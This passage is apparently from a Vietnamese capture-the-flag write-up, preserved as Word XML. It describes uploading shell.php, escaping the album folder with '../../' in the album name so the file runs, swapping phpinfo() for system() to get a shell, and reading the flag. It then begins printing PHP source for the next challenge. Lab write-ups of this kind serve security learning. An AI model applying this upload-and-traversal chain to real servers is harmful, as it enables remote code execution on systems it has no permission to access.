    <w:p w14:paraId="7002305B" w14:textId="3DDF3884" w:rsidR="0035108B" w:rsidRPr="00B107DA" w:rsidRDefault="00F93452" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện upload 1 file shell.php bình thường. Truy cập </w:t>
      </w:r>
      <w:r w:rsidR="009D2888" w:rsidRPr="009D2888">
        <w:t xml:space="preserve">trực tiếp vào đường dẫn lưu trữ file trên </w:t>
      </w:r>
      <w:r w:rsidR="00674217">
        <w:t xml:space="preserve">web: </w:t>
      </w:r>
      <w:r w:rsidR="00674217" w:rsidRPr="00674217">
        <w:t>/upload/&lt;session&gt;/&lt;album&gt;/shell.</w:t>
      </w:r>
      <w:r w:rsidR="00674217">
        <w:t>php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288C34DA" w14:textId="619FF4D0" w:rsidR="00C43095" w:rsidRDefault="00A96D57" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A96D57">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="507FB949" wp14:editId="63A4EC87">
            <wp:extent cx="5731510" cy="351790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="143237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72425" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="351790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7541E107" w14:textId="57E97AB2" w:rsidR="00674217" w:rsidRDefault="00674217" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00674217">
        <w:t xml:space="preserve">Trình duyệt truy cập thành công URL, nhưng nội dung file không được thực </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thi, </w:t>
      </w:r>
      <w:r w:rsidRPr="00674217">
        <w:t>thay vào đó, mã nguồn PHP được hiển thị dưới dạng văn bản hoặc trả về lỗi trắng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C198739" w14:textId="77777777" w:rsidR="0017615F" w:rsidRDefault="0017615F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C24784" w14:textId="585265D5" w:rsidR="00674217" w:rsidRDefault="00674217" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Thực hiện gửi lại file shell.php </w:t>
      </w:r>
      <w:r w:rsidR="00E025C3" w:rsidRPr="00E025C3">
        <w:t xml:space="preserve">bằng cách sử dụng chuỗi ../../ trong tên album. Mục tiêu là thoát khỏi thư mục album và ghi file vào vị trí web-accessible có thể thực thi </w:t>
      </w:r>
      <w:r w:rsidR="00E025C3">
        <w:t>được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD8085" w14:textId="0CDE033F" w:rsidR="00914607" w:rsidRDefault="00914607" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00914607">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C2F4627" wp14:editId="1EF4CAC6">
            <wp:extent cx="5731510" cy="2110105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="303030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30710" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2110105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A593715" w14:textId="1CEBE8B2" w:rsidR="00E025C3" w:rsidRPr="00E025C3" w:rsidRDefault="00E025C3" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>File php đã được thực thi thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AE4EC5" w14:textId="2CFF0872" w:rsidR="002932D2" w:rsidRDefault="002932D2" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002932D2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EF3C605" wp14:editId="0FF48A46">
            <wp:extent cx="5731510" cy="2303780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="348533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33034" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2303780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B04D80" w14:textId="7220B5A3" w:rsidR="008C5F02" w:rsidRDefault="008C5F02" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F02">
        <w:t>iến hành chỉnh sửa nội dung file để thực hiện lệnh hệ thống</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bằng cách thay thế hàm phpinfo() bằng system(). Gửi lại file và đã thành công truy cập shell của hệ thống:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94BB63" w14:textId="66DF1187" w:rsidR="00CE05F4" w:rsidRDefault="00CE05F4" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE05F4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45CBDCB0" wp14:editId="4A652E72">
            <wp:extent cx="5731510" cy="551180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="111643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32049" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="551180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD6EBC7" w14:textId="07DEBE96" w:rsidR="008C5F02" w:rsidRPr="008C5F02" w:rsidRDefault="008C5F02" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện đọc flag của bài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535C115B" w14:textId="7053FAF5" w:rsidR="00CE05F4" w:rsidRDefault="00CE05F4" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE05F4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60CF8DED" wp14:editId="7BB30CE9">
            <wp:extent cx="5731510" cy="530860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="24673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36701" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="530860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D80790D" w14:textId="77777777" w:rsidR="00205544" w:rsidRDefault="00205544" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F2AA32" w14:textId="77777777" w:rsidR="008C5F02" w:rsidRDefault="008C5F02" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45D9D3" w14:textId="697B12B8" w:rsidR="008C5F02" w:rsidRPr="00FF23DE" w:rsidRDefault="008C5F02" w:rsidP="004F0B2A">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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD2625" w14:textId="53E3FBF7" w:rsidR="00121B5F" w:rsidRDefault="008C5F02" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thông</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tin source code xử lý chính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121B5F" w:rsidRPr="00121B5F" w14:paraId="78FBEE26" w14:textId="77777777" w:rsidTr="00121B5F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71E82198" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="715DBA87" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33C9C60E" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EBFC80C" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6A60B4" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="520CCC41" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5004C4FC" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6205DC8C" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15EAE15F" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED4AC50" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FE358BE" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FD06F93" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A5552A9" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36510BC4" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3D271B" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B122CE5" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33513139" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CDA1E10" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66C03B27" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77AA4438" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A081E9D" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="048B5A0F" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710AAFF0" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="420C76C2" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7334D1F5" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'./db.php'</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C6789E8" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B226452" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="316F6BDE" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// if is not login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A89E178" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> (!isset($_SESSION[</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'name'</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>])) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="369B6673" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">        header(</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'Location: /register.php'</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B629EA" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2172AB36" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="471EE8BF" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> (isset($_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"points"</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>])) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07D3C5BA" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">        $points = intval($_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"points"</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="625517FB" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">        $db-&gt;update_point($_SESSION[</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'name'</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>], $points);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7585E6DA" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">        header(</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'Content-Type: application/json'</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CF61DE7" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Successfully update points"</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78E5DF30" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B01E17" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707F1053" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55A2344A" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve"> (!isset($_GET[</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'game'</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>])) {</w:t>
            </w:r>
          </w:p>
